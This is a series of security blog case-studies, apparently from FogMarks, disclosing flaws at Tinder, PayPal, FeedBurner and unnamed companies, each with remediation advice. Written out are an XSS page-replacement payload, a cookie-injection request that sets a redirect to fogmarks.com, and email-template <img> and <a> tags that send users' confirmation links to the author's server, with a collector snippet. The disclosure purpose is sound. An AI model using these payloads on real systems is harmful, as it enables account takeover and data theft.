Wrong Swipe, Tinder!

Honestly, when I needed to categorize this case-study, I didn’t know what to choose. Eventually I chose the “Logic flaws” category, partly because it’s true and mainly because I’m too lazy to add another category to the FogMarks archives.

Today’s case-study does not involve any vulnerability at all.
Yes – you heard me. No XSSes, no open redirects, no CSRFs or IDORs. Nothing. Nada.

We’ll only learn about a flawed implementation that Tinder used to integrate their users’ Instagram accounts into their platform.

While joking with (OK, more like at) a friend that the only way he’ll ever get a match on Tinder is if he finds a vulnerability in it, I started to read about recent security vulnerabilities Tinder has suffered.
So AppSecure found a way to take over Tinder accounts using Facebook’s Account Kit, which is awesome, and Checkmarx found that some information on Tinder is transferred over HTTP, again, god-knows-why.
But the vulnerability I found funniest and most interesting was the one discovered by IncludeSecurity, about how Tinder users’ locations were disclosed using triangulation.
A fascinating article about a creative way to disclose users’ locations using a very accurate location parameter that was returned with any regular request to their server. Basically, Tinder handed over a vulnerability for free.

And I was amazed by the simplicity of that

After reading IncludeSecurity’s article I was amazed by how simple that was. No IDOR was needed, no complex CSRF or an XSS. The information was right there, for free, for everyone to take and abuse.

And that’s when I started to think

I’ve spent a few hours researching Tinder’s website and Android app.
Really, in 2019, and especially after Facebook’s Cambridge Analytica crisis, Tinder has done a damn good job securing themselves from the typical OWASP Top 10 vulnerabilities.

This is also the place and the time to say that on paid platforms, it is really difficult to conduct quality security research. A lot of the actions on Tinder require a premium account, and repeating those actions as a premium user costs even more.
Companies that want their platforms to be researched by the security community should allow full access to their platform, for free.
I know that a lot of security companies can afford to fund the research, but it is not fair to small, independent young security researchers. Think about it.

I thought to myself that it’s over

During the few research hours I devoted that evening after joking with (OK, at) my friend, I could not find any interesting lead to a vulnerability on Tinder. I was (and am) so flooded with work that I couldn’t devote any more time to researching Tinder.
I had to message my friend that he would have to get himself that auto-swiper from AliExpress and hope for a match.

And then IncludeSecurity’s article popped into my head. I thought to myself: “If Tinder’s logic in that case was not very privacy-oriented, what other sensitive information do they pass ‘out in the wild’ that should have been kept private?”

3rd-party integrations are the name of the game

Tinder, like many other social platforms, has several integrations with some very popular companies and platforms – Spotify, Facebook and even some universities.

While simply going through all the responses that came back from the application’s regular Android API calls, I noticed that when a user connects his Instagram account to Tinder, his Instagram photos are shown on his profile page.

Yes, 12:55 AM is considered my evening.

After tapping the ‘Share X’s Profile’ button, I noticed that a unique share identifier had been generated for that profile, which looked like this:

When I accessed this URL from the web version of Tinder, nothing happened – I was redirected to https://tinder.com

But when I accessed it from an Android phone’s browser, the Tinder app launched and a GET request to https://api.gotinder.com/user/share/~<UNIQUE_SHARE_ID> was initiated.
The response to that request contained a lot of details about the user, including their Instagram username.


It is the first time in the history of my case-studies that I don’t have something smart to say or teach. This vulnerability (which has been patched, of course) and the one IncludeSecurity found could have been easily prevented by simply going through the returned data of all the supported API calls and making sure that only non-private information is handed over.
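That “go through the returned data” advice can be sketched as an explicit response whitelist: the server serializes only a fixed list of public fields instead of the whole user object, so a privately-linked Instagram username can never ride along. The field names below are purely illustrative, not Tinder’s real schema:

```javascript
// Hypothetical sketch: only an explicit whitelist of fields ever
// leaves the server through a share endpoint. Field names are made up.
const PUBLIC_FIELDS = ["name", "bio", "photos"];

function toPublicProfile(user) {
  return Object.fromEntries(
    PUBLIC_FIELDS.filter((field) => field in user).map((field) => [field, user[field]])
  );
}

// A full internal record goes in, only the public subset comes out:
const internalUser = { name: "Jane", bio: "hi", instagram: "jane_ig", phone: "555" };
console.log(toPublicProfile(internalUser)); // { name: 'Jane', bio: 'hi' }
```

The point of the opt-in list is that a newly added internal column stays private by default, instead of leaking until someone notices.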

In the end, I believe a QA team did go through the returned data of the API calls, but for the wrong purposes: they probably just made sure that the returned data is exactly what the front-end UI expects.

I think that the most important lesson here is that the QA stage before a version release is not enough, as large and comprehensive as it may be.
Having a Red-team is crucial for the safety of the about-to-be-released product and its users.


Keep Your Friends Close and Your Domains Closer!

Stay updated on FogMarks!

Happy 2019!
Hopefully you guys survived New Year’s Eve and didn’t ignore the alarm clock and wake up 2 hours late like someone I know did..!

So, after my sincere, heartbreaking apology last year (i.e. two days ago), as promised, here is the case-study. Unfortunately, the involved company did not allow me to disclose its name, due to the possibility that the vulnerability we are going to discuss still exists in some other variations of its platforms.

So what is this all about?

To start the new year in the right mood, today’s case-study presents a different kind of vulnerability: a so-called “logic flaw” that can happen to you as well, if you’re not aware of it.

So, a certain company had a midlife crisis. Some fundamental, non-tech errors were made, the stock took a 40-meter dive into the Red Sea, and 30% of the staff were fired. The CTO was among them.
As bad as it may sound, this situation is not new. A lot of tech companies, even solid and super-rich ones, suffer from it. Once money and non-tech stockholders are involved, things can get pretty rough, and sometimes actions are taken too quickly.

That company’s main business is providing frontend JavaScript rich-text editing services: their main product is a beautiful WYSIWYG editor which serves dozens of popular platforms and websites.

No, not another WYSIWYG XSS!

The thing is that their WYSIWYG editor was great. It didn’t have known security vulnerabilities, it functioned terrifically, and it was a great success.
To distribute it to their customers, they offered them to install it via npm, or to reference it directly via their official CDN (i.e. place <script src="https://xxxx.yyy/WYSIWYG.js"></script> and the .css in the source code).

If you’ve read my past posts regarding the latter solution – asking (or forcing) the clients to reference your CDN directly, so they always have the latest patched release – you might think that there is nothing wrong with that.
Well, here is something I didn’t think of when proposing that you be referenced directly by your clients: you may lose your domain!


Indeed. Remember that I said the CTO was fired during the midlife crisis? Well, one of his responsibilities was to renew the product’s domain (which was separate from their main domain – to his credit!).
After he and some other dev staff got fired, the board was in such a mess that they completely forgot the globe was still spinning and that bills should be paid.

When the fatal date arrived (on a Sunday, of course), everyone was asleep. Except for a domain-troll bot, which immediately acquired the domain.


Actually, the title is badly misleading.
When I was approached with this problem (36 hours after the domain loss, and only after the customers had reported it to the help team), I really didn’t have anything smart to say.
The domain was bought legally by another company who saw it had expired. What can be done? Sue that China-Taiwan-New Mexico-Arab Emirates-Thailand legit company? Hack into their systems and liberate the stolen domain? Nothing could be done fast enough to minimize the damage to the customers and the company, except starting a negotiation with the domain acquirer and praying to god (or whatever).


The crisis ended, ironically, near the last day of Hanukkah, with the company buying back the domain at a very, very inflated price. Well, even trolls gotta eat.

So why did I choose to open 2019 by sharing this type of case-study with you? Because security vulnerabilities are endless – always were, always will be. But all of them are solvable. Some can be solved easily, some only after 3 gallons of coffee and 1 liter of the dev team’s tears, but eventually software issues are solvable.
This was not a software issue. This was the loss of a very expensive and important asset, which resulted in a massive loss of money (and a few customers, who now doubt the company’s stability).
So what can be done to prevent these types of “vulnerabilities”?

  1. Don’t fire the CTO. Glue him to his chair if you have to. I’m kidding. Establish the practice in your company that when a member leaves – whether it’s the CTO or a QA person – he writes down his responsibilities and passes them to his successor. Simple, right?
  2. For this specific domain-loss issue: for god’s sake, buy domain names and similar assets for 10+ years! You are a f*****g commercial company and it costs you nothing.
  3. Always monitor your services, internal and external ones. The clients should never be the ones who detect an issue in your platform or service. Some 3rd-party keep-alive functionality will do the trick.
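To make guideline 3 concrete, here is a minimal sketch of the decision logic such a keep-alive probe could use (everything here is an assumption, not a real monitoring product): a parked or hijacked domain typically answers with a different status code, or serves an HTML landing page where your script bundle used to be.

```javascript
// Hypothetical keep-alive check for a CDN-hosted script. A parked
// domain usually serves an HTML page (or an error) instead of the
// expected JavaScript, so both signals should trigger an alert.
function shouldAlert(status, contentType) {
  if (status !== 200) return true;
  return !String(contentType).toLowerCase().includes("javascript");
}

console.log(shouldAlert(200, "application/javascript")); // false - all good
console.log(shouldAlert(200, "text/html"));              // true  - parked page?
console.log(shouldAlert(404, "application/javascript")); // true
```

An external cron job fetching the CDN URL every few minutes and feeding the response into a check like this would have paged someone long before the customers noticed.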

2018 was a great, super-educating year. I hope 2019 will be even more educating and even more challenging.
Happy New Year!


Keep Your Friends Close and Your Domains Closer! [Intro]

Stay updated on FogMarks. More to come soon. Pinky-swear.

Ok ok, I know.

(TL;DR – me apologizing for not being around this year. You can skip right ahead to the case-study.)

No post has been made since January 2018. Not even one XSS has been triggered, not even one byte of data has been leaked from a DB, and not even one line of arbitrary code has been remotely executed. I could go on like that all night.
But listen, before the beating, hear me out first.

FogMarks started as a self-test. Somewhere around November 2015, I worked as a junior security researcher at some company. That place had terrible work manners: “Juniors are dumb, so they should not write code for the production products (i.e. add features, get involved in development), nor conduct security research. They should first sit down and look at others’ work”. Honestly, I was never good at looking at others and doing nothing.
So, I offered my help and expressed my opinion on a lot of issues and active research that was going on. And well, they didn’t like that.
They complained about me to the “superiors” and I was (rudely) asked to pretty much mind some other boring junior business.

At that time I was fascinated by finding a way to disable the AdBlock Chrome extension remotely (yes, not the nicest thing to do, I know :). I started conducting my own private research in the evenings; I was coming back from work straight to my real work. Time passed, and indeed I found a way to crash AdBlock (on Chrome 47 – gosh, I’m old!). But during that research, which involved a lot of digging, trial & error and tears, I was exposed to how insecure modern platforms are. I read lots of badly implemented source code in some very sensitive and widely used open-source products, and I was shocked by some half-an-hour-to-find severe security vulnerabilities that were (and still are, and always will be) in the world’s most popular platforms.
I decided to devote my time to helping solve those issues, conducting white-hat security research and, most importantly, sharing my experiences, thoughts, ideas and some of my work methods and ideologies – here.

This is the story of how FogMarks was born. By the way, if we are being completely honest here, the name FogMarks only popped into my head around February 2016, while I was driving to the cinema during one of Israel’s heaviest fogs ever. The road had blinking warning marks on it, and at some point I told my girlfriend that I could only see the marks in the fog and I just followed them to safety. Fog Marks.

So what the hell happened in 2018?!

After 2 years of researching, I came across a very interesting development opportunity. Nothing crazy, but a very helpful set of utils that can ease the lives of a lot of people.
The thing is that developing it took a lot of time and a lot of planning, so I wasn’t active at all since January.

So you missed it and came crawling back, huh?!

Yeah. You got it. Security research is one of the funnest things I’ve done in my career. I had to put it on hold so I could focus on that other project. But this year, that project has hopefully stabilized – so I’m back on, baby!

Keep Your Friends Close and Your Domains Closer!

Edit [30/12/2018]: This part will be published on January 1st, as I hope that company will allow me to disclose its name by then.

Stay tuned!

Edit [01/01/2019]: Post has been published.

DoS: Back From The Dead?

Stay updated on FogMarks

Happy 2018!

January is the perfect after-holidays time to point out our goals for the next year. And to lose some weight (because of the holidays), of course!
FogMarks always aims to write the most interesting case-studies about the latest “hot” vulnerabilities, and 2018 is going to be super-exciting!

So, finally, after a long break, here we are again, discussing a vulnerability that many thought was dead: the Denial of Service attack.
I’ve heard a lot of statements in the sec community regarding DoS attacks and vulnerabilities. Most of them addressed DoS as “an attack of the past”, as a vulnerability that cannot affect the server side anymore, thanks to companies such as Cloudflare, Nexusguard and other load-balancing service providers.

As a result, a lot of bug bounty programs don’t accept DoS vulnerability submissions, and sometimes even forbid the researcher from testing, in fear of an effect on the system’s stability and user experience. And they’re right, sort of.

But who said that a DoS attack has to target the server? It takes two to tango: if the server is now “protected” against DoS attacks (by an anti-DoS/DDoS service), who is protecting the user?

Let me elaborate on that: companies are so busy preventing DoS attacks on their servers that they forget DoS attacks are possible against users as well. A Denial of Service attack, by my definition, is any attack which prevents a user from accessing a resource or a service. This can be done by directly attacking the server (like trying to make it “shut down” from over-traffic) or by directly attacking the users.

Actually, attacking the users is the easier way to do it. In addition, in a lot of cases the company won’t even know that the user was attacked until the user contacts the company and says “Hey, I cannot access X”.

You all know what I’m about to say now. Which type of vulnerability can cause a DoS attack against a specific user super fast? An XSS, of course!

Sending or planting an XSS payload which disrupts a certain service for specific users causes a severe denial of that service or resource to those users. The payload can be a simple redirection off the site, or even a document.write('') call that simply prints a white page or a misleading page.
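As a rough illustration (the markup here is made up, not the payload actually used), such a payload only needs to replace the document with something useless. In a victim’s browser, document.write(fake404) would wipe the real page; the snippet below just builds the injected string an attacker might plant:

```javascript
// Hypothetical DoS-by-XSS payload builder. In a browser, executing
// document.write(fake404) replaces the entire page with a fake error,
// denying the user access to the real content.
const fake404 = "<h1>404 Not Found</h1>";
const payload = "<script>document.write(" + JSON.stringify(fake404) + ")<\/script>";
console.log(payload);
```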

A certain very well-known commercial company, which hasn’t allowed us to mention its name yet, suffered from that exact attack.
When I first started to research their main product, I was told not to DoS or DDoS their servers, “because we have anti-DDoS mechanisms that prevent that, and we think DoS attacks belong to the past”. Of course, DoS from a different angle was the next thing I did to their product 🙂

I came to understand that an XSS payload could be sent directly to a specific user or group of users. That XSS was “universal”: it executed from any page of the site, because of the messaging feature that appeared on every page. I planted an XSS payload which simply echoed a mock “404 Not Found” page onto the page. To prove that this issue was indeed severe, the head of their security response team and I tested the attack on the production site, against one of the developers. His response (“WTF? What happened to the site?”) was hilarious.

Although most modern servers are now protected against DoS and DDoS attacks thanks to smart load balancing and malicious-request blocking services, the user is still out there – unarmed and unprotected. You should always treat any type of attack that can prevent an action from being fulfilled as a major security issue, regardless of the type of the vulnerability.

Happy & Successful 2018!

Phishing++ – Chapter II

Stay tuned on FogMarks

Hi! Long-time-no-case-studied.
I know, I know, this chapter was supposed to be released two weeks ago, but we waited for PayPal’s official permission to disclose these two vulnerabilities before even starting to write the case-study (why? Read our about page).

So, finally – PayPal kindly allowed us to disclose two HTMLi/XSS vulnerabilities they had last summer, and that’s perfect, because now we can show you a real-life scenario that actually happened.
Before reading this, please make sure you have fully read and understood the previous chapter. This is vital for this final chapter – it’s like you cannot start watching Breaking Bad from the second season (although I know a guy who did, because he was too lazy to download the first season. Weirdo.)

In the last chapter we talked about what companies can do to prevent 3rd party malicious phishing websites from using their HTML entities such as images, JS scripts and CSS style-sheets.
Today we are going to talk about the most dangerous & complicated phishing attacks: phishing attacks that occur on the official website.

In the past, phishing was super-easy. New internet users didn’t understand the importance, or even the existence, of an official domain. They were used to accessing their desired websites via a bookmark, via a mail someone sent them and, later on, via Google.
Later, phishing became less easy. Companies started to warn their users against accessing the site from wrong sources, like email messages or forum links. They made their users aware of the domain part of the browser’s address bar. And indeed, most users have adapted to these security precautions and now double-check the domain they’re viewing before taking any action.

But no one prepared the companies for this new stage of phishing attacks: phishing on the companies’ official websites! Imagine that a malicious, deceptive page is inserted into the website under the official company domain.
A malicious file doesn’t even have to be uploaded – existing pages of the company can be altered by attackers, using XSSes, HTML injections, header injections or parameter injections, and malicious content will be displayed.

Actually, there’s only one TV series about “cyber” security I appreciate: CSI: Cyber. They presented this exact case of HTML injection in the 10th episode of the first season.

Ok, now that we learned how to swim – let’s jump to the middle of the ocean.
PayPal suffered from two XSS/HTML Injection vulnerabilities which allowed 3rd-party malicious content to be added to official PayPal pages under the official ‘www.paypal.com’ domain.

This allowed us to create some very nice Phishing templates, such as:

In addition, we were able to actually create a <form> inside a page, which allowed us to send victims’ credit card data to a 3rd-party website. Unfortunately, we were not allowed to publish this demo.

I even created an online ‘Web Gun’ content spoofer which can inject HTML entities directly into a vulnerable page:

The fix
Actually, there is no easy fix. Hunting down vulnerabilities and paying attention to payloads that are being injected into the website’s pages – via GET/POST requests or via SQL queries (in the case of a persistent XSS) – is pretty much the best way to handle this threat.
XSS auditors – as PayPal’s case shows – simply don’t work.

Writing this 2-chapter sequel was very fun. Expect similar case-studies in the near future.
But till then,

Phishing++ – Chapter I

Hi! What’s going on?

Today’s case-study is a bit different: it is a 2-chapter article. The next chapter will be published as soon as a certain company allows us to publicly disclose two vulnerabilities they had.

Today I’m not gonna talk about a regular attack – this whole chapter is about Phishing.

So, phishing – why the hell are we talking about it? “It’s not a security issue”

I’ve heard dozens of statements about how phishing is not an actual vulnerability, and many public companies think so. It’s fair to say that they are quite right: a 3rd-party website that is pretending to be the real one is not an actual vulnerability in the real site.

But does that mean that the company should not care at all? No. Some companies (like PayPal, Facebook, etc.) report phishing attacks to anti-virus companies, which block users from entering the malicious site. That’s fair, but it’s not enough. There is not enough manpower, or even “internet crawling power”, to fully protect users from malicious phishing websites. Actually, most companies do not care that there are malicious pretenders out there. In their ToS agreements, some of them rudely state that the customer is fully responsible for any data/money loss/theft if he falls victim to a phishing attack.

But I say that there is more to do than looking at the sky and counting birds. A small research project I conducted on some phishing websites that pretended to be PayPal and Facebook led me to write this chapter of the case-study, instead of fully presenting the vulnerability as I always do.

I realized that in order to perfect their visual appearance, phishing websites use actual photos, CSS and JavaScript elements from the original site. This means that the PayPal-like phishing site “https://xxxx.com” has image and JavaScript tags which fetch images and scripts from the original PayPal site (or https://paypalobjects.com, to be accurate).

Why are they doing so? Why should that matter?
They do it because they want the experience of the website to be exactly like the original. And how can that be achieved? Simple! By using the same images and JavaScript scripts.
Most of those websites have only one page – either Login (to steal the login credentials) or Pay (to steal the credit card credentials). The actual source code is a lot like the original one, except for minor changes to the way the data is sent.
It matters because once a company knows that a malicious website is using its assets – it can stop it!

A simple fix that the company can apply “tomorrow morning” is to disallow fetching of its JavaScript scripts, images and CSS style sheets by unauthorized 3rd-party websites. This way, phishing websites will have to work harder to get the same experience and appearance as the original website.
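As a sketch of what that could look like on the server (an Express-style middleware with a hypothetical allowed-origins list; nothing here is a real company’s config): requests for static assets whose Referer isn’t one of your own origins get rejected. The Referer header is trivially spoofable by a custom client, but the browsers of phishing victims will faithfully send the phishing site’s origin.

```javascript
// Hypothetical referrer-based hotlink protection. ALLOWED lists the
// origins that are permitted to embed our images/scripts/styles.
const ALLOWED = ["https://www.example.com", "https://objects.example.com"];

function isAllowedReferer(referer) {
  // Missing Referer: rejected here; some sites choose to allow it.
  if (!referer) return false;
  return ALLOWED.some((origin) => referer === origin || referer.startsWith(origin + "/"));
}

// Express-style middleware guarding a static /assets/* route.
function assetGuard(req, res, next) {
  if (isAllowedReferer(req.headers["referer"])) return next();
  res.statusCode = 403;
  res.end("Forbidden");
}
```

Checking `origin + "/"` (rather than a bare prefix) avoids waving through look-alike domains such as `https://www.example.com.evil.net`.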

It’s never 100%
Even if websites disallow unauthorized fetching of their assets, phishing sites will always be able to store copies of the images, CSS and JavaScript on their own. It’s a cat-and-mouse race that is probably far from over.
But it’s another step forward. Making the lives of phishing-site makers harder should be a life goal of every company and security researcher.

Heads up for the next chapter! Cheers.

Cookies And Scream

Whoa, What a summer!
I know, we haven’t been active in the last month – blame that on the heat and on my addiction to the sea. I should really get a swimming pool.

OK, enough talking! The summer is almost over and now it’s time to step on the gas pedal full time.
Today’s case-study also discusses proper user-supplied input handling, but with a twist.

I feel like I’ve talked enough about the importance of properly handling and sanitizing user-supplied input. There are tons of XSS and HTML filters out there, and they do a pretty good job.
But user input isn’t always shown on the page or inserted into the DB. In some cases, many popular web platforms store it in a cookie.

PayPal, for example, inserts the value of the GET parameter ‘cmd’ as the value of the cookie ‘navcmd’:

GET https://cms.paypal.com/cgi-bin/marketingweb?cmd=test HTTP/1.1
Host: cms.paypal.com
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8,he;q=0.6

HTTP/1.1 404 Not Found
Server: Apache
Cache-Control: must-revalidate, proxy-revalidate, no-cache, no-store
X-Frame-Options: SAMEORIGIN
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Date: Wed, 30 Aug 2017 21:15:04 GMT
Content-Length: 8764
Connection: keep-alive
Set-Cookie: navcmd=test; domain=.paypal.com; path=/; Secure; HttpOnly

There’s nothing evil about storing user-supplied input in a cookie; it’s actually a good practice sometimes, if you don’t want to use sessions or other similar mechanisms.
A very common use for user-supplied input in a cookie is storing a redirect URL: sometimes you want to remember which page the user came from, or where to redirect him at the end of the process. Keep that in mind.
Before I get to the vulnerability itself, I’ll tease you a bit and say that this time, the malicious payload bypassed the XSS & HTML sanitization mechanism.

A very well-known financing company had this exact cookie functionality. User input from some GET parameters was stored in cookies. For example, the value of the GET parameter ‘redirect_url’ was stored in the cookie ‘return_url’. This cookie was then used by dozens of other pages in order to redirect users to a “thank you” page. An open-redirect attack on that parameter was not possible, because the value of the GET parameter ‘redirect_url’ was checked & verified before being allowed to be set as a cookie.

At first glance, everything looked fine. I read the JS code that was responsible for sanitizing the input and determined that it was doing its job pretty well: no HTML entities or other “bad” characters (like ' or ") could be reflected, thanks to the encodeURI function that was being used intensively.

And then it hit me. encodeURI doesn’t encode characters like ; or = – the exact characters that are used when setting a cookie!
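You can see the gap in a couple of lines of JavaScript:

```javascript
// encodeURI leaves ';' and '=' (and ':', '/') untouched, so a value
// meant to be a single cookie token can smuggle a whole extra cookie.
// encodeURIComponent escapes them, keeping the value one opaque token.
const payload = "xyz;return_url=https://fogmarks.com";

console.log(encodeURI(payload));
// -> xyz;return_url=https://fogmarks.com      (unchanged: injection!)
console.log(encodeURIComponent(payload));
// -> xyz%3Breturn_url%3Dhttps%3A%2F%2Ffogmarks.com   (safe)
```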
So, I sent a GET request to the vulnerable URL, without the ‘return_url’ GET parameter (to prevent collisions):

GET https://vulnsite.com/action?vulnGETParameter=xyz;return_url=https://fogmarks.com HTTP/1.1

HTTP/1.1 200 OK
Set-Cookie: vulnGETParameter=xyz;return_url=https://fogmarks.com; domain=.vulnsite.com; path=/; Secure; HttpOnly

The result of this, in some cases, was an open redirect in pages that relied on the assumption that the value of ‘return_url’ would always be safe.

When you decide to store user input in a cookie, you must know how to treat it well, and you must remember to dispose of it when the time is right. In this case, using the same sanitization mechanism for input that will be shown on the page and input that will be inserted into a cookie is wrong.
The patch here was simple: instead of encodeURI, encodeURIComponent() was used.

Happy & chilled autumn folks!

Doppelgangers Week

Hey-O! How’s it going?

Today’s case-study is about a subject we’ve never discussed before (or maybe only a little bit): proper & secure database management.

So, databases. We all use them. SQL-based or not, we need some sort of non-volatile mechanism to save our data.
Whether you like it or not, the SQL-based databases (MySQL, MS-SQL etc.) are currently still the most used databases in the world, and a lot of companies use them as their main storage mechanism. Long live the Structured Query Language! (no;-)

So – properly managing & controlling the database. I know, you’re thinking: “What the hell does this guy want? It’s so obvious to manage and control my DB!”. Shut up and read!
First, let’s talk business: I have seen “more than a few” companies that don’t know how to control their own database(s):
a. The database connection string is known to a lot of other mechanisms.
b. There is only one user – the root one – and every mechanism uses it.
c. Even if there are a few users – one for each mechanism – all of the users have basically the same permission set.
d. There are no DB backups. EVER!
e. And more horrifying things that I won’t mention, because there might be children reading these lines, and it’s bedtime.

The database is one of the most sacred mechanisms in the application. It doesn’t matter what type of data it stores – it should be well treated.

A well-treated DB (Database)
First, let’s set things straight: “well-treated DB” does not mean a “DB suffering from obesity”. This case-study will not discuss the type of DB collection that your application should use, rules for not flooding your DB, or the advantages and disadvantages of using an SQL-based DB.
This article will highlight the risks of improperly handling your DB by showing you a real-life example, and will supply some fundamental guidelines to keep your application safer.

A very well-known real-estate company, whose name we cannot disclose (and we respect their decision), suffered from some of the horrifying cases I described above: their connection string was known to a lot of mechanisms, they had only one fully-privileged root user, and they didn’t have automatic periodic backups.

They had a main production DB which had a few tables. The main table was ‘user’ – a table which, among other things, held the user ID, username (which was an email address) and salted password.

The email address was the user’s main identifier, and it could be changed/replaced by the user. The change took place immediately, and until the user clicked a confirmation link sent to the new email address he supplied, he wasn’t able to execute any “massive” action on the application, except for information fetches. Which means the user was still able to see his own objects and data on the application.

So far so good: despite the lack of awareness of the mentioned horrors (shared connection string, root user, no backups), no SQL injection was possible, no CSRF was found, and the code was pretty well secured. Except for one thing: it was not possible to supply an already existing email address when signing up, but it was possible to change an email address to an existing one.

“So what?”, “What’s the impact?”, you say.
Well, at first I also thought: meh, not much. But I was wrong. Very wrong.
When the DB had 2 rows with the same email address in the main table, things went crazy. Actions and data relevant to one email address were relevant and visible to the other!

For example, the query to view all private assets which are related to that email looked very simple, like:

SELECT * FROM Assets WHERE EmailAddress = '<EMAIL_ADDRESS>';

And it returned the private assets related to those TWO emails. An attacker could have changed his email to a victim’s one and then leaked highly valuable, private data.

When we and the company examined the code, we understood that another mechanism was responsible for changing the email address – and there were no existence checks at all. A simple mistake which could have led to a major disaster.
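The missing check is only a few lines. The sketch below uses a hypothetical Node-style `db.query` API and the table/column names from the query above; it is an illustration, not the company’s actual code. A UNIQUE constraint on the column is the real safety net – the application-level check just produces a friendly error:

```javascript
// Hypothetical sketch of the check the email-change mechanism lacked:
// refuse the change when another row already owns the address.
async function changeEmail(db, userId, newEmail) {
  const taken = await db.query(
    "SELECT 1 FROM user WHERE EmailAddress = ? AND Id <> ? LIMIT 1",
    [newEmail, userId]
  );
  if (taken.length > 0) {
    throw new Error("Email address already in use");
  }
  await db.query("UPDATE user SET EmailAddress = ? WHERE Id = ?", [newEmail, userId]);
}
```

With a UNIQUE constraint in place as well, even a mechanism that forgets this check cannot create the duplicate rows that caused the leak.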

So… give me your f-ing guidelines already!
This issue could have been easily prevented. The company agreed that this is a simple logic flaw. Maybe the programmer was tired. And the code reviewer(s). And the QA. I don’t know…
0. So the first guideline is to always drink coffee while writing such sensitive features. Or coke. Definitely not beer. Don’t ask.
1. The second one is to always have one, and only one, DB managing mechanism. Write a simple, shared DB wrapper that every other mechanism in your application uses. Don't have a separate DB util for each feature, and certainly don't allow unrelated mechanisms to supply you the SQL query.
2. Don't be naive. Check all user-supplied data for malicious characters. Integrate your existing sanitation engine into your DB managing mechanism.
3. If you can – never delete something from the DB. Remember: restoring is harder than resetting. It is best to simply have an indication that a row is ‘inactive’ instead of deleting it from your DB. Don’t be cheap on space.
4. This one is pretty obvious: Don’t allow non-certified users to execute requests that influence the DB.
5. Have a periodic, 3rd-party service that backs up your DB every x hours. Give this service a dedicated user with only SELECT privileges.
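Guidelines 1–3 fit naturally into a single class. A short sketch (all names are hypothetical) of one shared DB wrapper that only accepts parameterized queries and uses soft deletes:

```python
import sqlite3

class Db:
    """The one and only DB managing mechanism (guideline 1).
    Callers never hand it raw SQL built from user input."""

    def __init__(self, path=":memory:"):
        self.conn = sqlite3.connect(path)
        self.conn.execute(
            "CREATE TABLE IF NOT EXISTS assets "
            "(id INTEGER PRIMARY KEY, email TEXT, active INTEGER DEFAULT 1)"
        )

    def add_asset(self, email):
        # Parameterized query – user data is never concatenated in (guideline 2).
        self.conn.execute("INSERT INTO assets (email) VALUES (?)", (email,))

    def assets_for(self, email):
        return self.conn.execute(
            "SELECT id FROM assets WHERE email = ? AND active = 1", (email,)
        ).fetchall()

    def remove_asset(self, asset_id):
        # Soft delete (guideline 3): flag the row, don't drop it.
        self.conn.execute("UPDATE assets SET active = 0 WHERE id = ?", (asset_id,))

db = Db()
db.add_asset("user@example.com")
db.remove_asset(1)
print(db.assets_for("user@example.com"))  # [] – the row still exists, just inactive
```

Because every feature goes through the same wrapper, a fix (or an audit) in one place covers the whole application – the exact opposite of the "another mechanism nobody checked" situation above.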

Those 5 "gold" guidelines (and #5 is the most important, in my opinion) will ensure you won't have a heart attack when things go wrong.
We’ll talk about having a Defibrillator later.


Hi there! Long time no see!
One of the reasons for our blackout, besides tons of vacations and hours of playing Far Cry Primal, was that we have been very busy exploring new ground in web & application research. Today we would like to present one of those new areas.

Our research in the past couple of months did not focus on XSS and other well-known P1 and P2 vulnerabilities. In fact, we wanted to focus on something new & exciting. You can call us Columbus. But please don't.

So, “out-of-the-box” vulnerabilities. What are they? Well, in my definition, those are vulnerabilities that don’t have a known definition.
Today's case-study is exactly one of those exciting new findings. This time, the research was not company-specific. It was method-specific.

Method-specific research?
It's simple. I wasn't looking for vulnerabilities in a certain company. I was looking for logic flaws in the way things are done in the most widely used communication methods.
Although the research produced some amazing findings in the HTTP protocol, those cannot be shared at the moment. But don’t you worry! There is enough to tell about our friend, the SMTP protocol, and the way it is being used around the web.

In short, the SMTP protocol is widely used by millions of web applications to send email messages to their clients. The protocol is very convenient and easy to use, and many companies have made it part of their everyday operations: swapping messages between employees, communicating with customers (notifications, etc.) and much more. But the most common use right now for SMTP (or simply for 'sending mail') is to verify user accounts.

One of SMTP features is that it allows sending stylish, pretty HTML messages. Remember that.

When users register to a certain web application, they immediately get an email which requires them to approve or to verify themselves, as a proof that this email address really belongs to them.

FeedBurner, for example, sends this kind of subscription confirmation email to users who subscribe to a certain feed. This email contains a link with an access token that validates that the email address is indeed used by the client. The email's content is controllable by the feed owner, although the content must include a placeholder for the confirmation link: '$(confirmlink)'.

"SMTP allows sending HTML, so let's send XSSs to users and party hard" – not really. Although SMTP supports HTML, including malicious JavaScript tags, the receiving application's XSS auditor/sanitizer is responsible for cleaning the HTML that arrived over SMTP before parsing it and rendering it to the viewer.

And that's where I started to think: how can I hijack the verification link that users receive in their mailbox, without an XSS/CSRF and without, of course, breaking into their mail account? I knew that I could include sanitized, non-malicious HTML code, but I couldn't execute any JS code.

The answer was: Abusing the HTML in the SMTP protocol. Remember that non-malicious HTML tags are allowed? Tags like <a>, <b>, <u>.

In my FeedBurner feed, I simply added to the custom email template (of the subscription confirmation email) the following code:

<a href="https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)">Click here!!!</a>

And it worked. The users received an email with non-malicious HTML code. When they clicked the link, the confirmation link was logged on a server of mine.

I thought: "Cool, but user interaction is still required. How can I send this confirmation link to my server without any sort of user interaction, and without any JS event?" Well, the answer is incredible. I'll use the one allowed tag that is loaded automatically when the page comes up: <img>!

By simply adding this code to the email template:

<img src="https://fogmarks.com/feedburner_poc/newentry?p=$(confirmlink)" />

I was able to send the confirmation link to my server without any user interaction. I abused HTML's automatic image loading mechanism, and the fact that sanitized HTML could be sent over SMTP.
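The collecting side needs almost nothing. A hypothetical stand-in for my `/feedburner_poc/newentry` endpoint – all it has to do is pull the leaked confirmation link out of the `p` query parameter and record it:

```python
from urllib.parse import urlparse, parse_qs

# Everything the "attacker's server" captures goes here.
captured = []

def handle_request(path: str) -> None:
    """Hypothetical request handler for /feedburner_poc/newentry."""
    query = parse_qs(urlparse(path).query)
    if "p" in query:
        captured.append(query["p"][0])  # the victim's confirmation link

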